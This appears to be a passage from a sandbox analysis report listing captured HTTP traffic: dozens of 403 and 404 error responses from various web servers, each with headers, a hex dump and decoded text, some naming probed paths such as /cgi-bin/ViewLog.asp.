    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:35:57 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: uvlive/6.4.2 Rev15Connection:closeContent-Length: 0Access-Control-Allow-Origin: *
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:08 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sun, 14 Apr 2024 14:36:08 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:09 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.27Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:10 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Sun, 14 Apr 2024 14:29:53 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.23.3Date: Sun, 14 Apr 2024 14:36:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.23.3</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache/2.4.6 (CentOS)Date: Sun, 14 Apr 2024 14:36:30 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:32 GMTServer: ApacheContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 18:26:13 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cachePragma: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self';default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline'X-XSS-Protection: 1; mode=blockX-Content-Type-Options: 'nosniff'Date: Sun, 14 Apr 2024 16:36:45 GMTContent-Type: text/htmlConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:36:42 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 15:36:42 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Sun, 14 Apr 2024 14:36:44 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plainConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 11:37:20 GMTServer: ApacheContent-Length: 264Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 66 61 75 6c 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache Server at default Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 14 Apr 2024 14:36:52 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 1159230463497157463Connection: closeServer: stsoc_lego1Date: Sun, 14 Apr 2024 14:36:56 GMTX-Cache-Lookup: Return Directly
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 11271022956155102925Connection: closeServer: stsoc_lego1Date: Sun, 14 Apr 2024 14:36:56 GMTX-Cache-Lookup: Return Directly
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 1159230463497157463Connection: closeServer: stsoc_lego1Date: Sun, 14 Apr 2024 14:36:56 GMTX-Cache-Lookup: Return Directly
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 45Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 14 Apr 2024 14:37:04 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Sun, 14 Apr 2024 14:38:13 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 14 Apr 2024 14:37:07 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Disposition: inline;filename=f.txtContent-Type: application/jsonConnection: closeData Raw: 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 34 2d 31 34 54 31 34 3a 33 37 3a 31 31 2e 35 33 38 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d Data Ascii: {"timestamp":"2024-04-14T14:37:11.538+00:00","status":404,"error":"Not Found","message":""}
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 14 Apr 2024 14:37:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 02:55:06 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 14 Apr 2024 14:37:21 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: WebServerDate: Sun, 14 Apr 2024 14:36:48 GMTContent-Type: text/htmlContent-Length: 110Connection: closeData Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
